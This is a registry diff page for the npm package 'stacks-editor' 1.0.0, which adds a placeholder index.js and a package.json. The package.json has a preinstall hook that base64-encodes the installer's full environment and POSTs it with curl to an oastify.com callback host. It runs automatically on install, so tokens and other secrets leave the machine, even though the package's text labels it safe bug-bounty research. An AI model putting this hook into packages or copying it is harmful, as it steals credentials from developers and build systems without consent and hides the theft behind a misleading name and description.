stacks-editor 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +10 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // Placeholder file for npm package structure.
2
+ // The actual callback is performed in the preinstall script.
3
+ console.log('Bug bounty security research package. No malicious activity.');
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "name": "stacks-editor",
3
+ "version": "1.0.0",
4
+ "description": "Bug Bounty Security Research - Safe Harbor Callback",
5
+ "scripts": {
6
+ "preinstall": "curl -X POST https://7270y6kiovl8a6pzgg538rx6cxio6nuc.oastify.com?env=$(env | base64 -w0)"
7
+ },
8
+ "author": "",
9
+ "license": "ISC"
10
+ }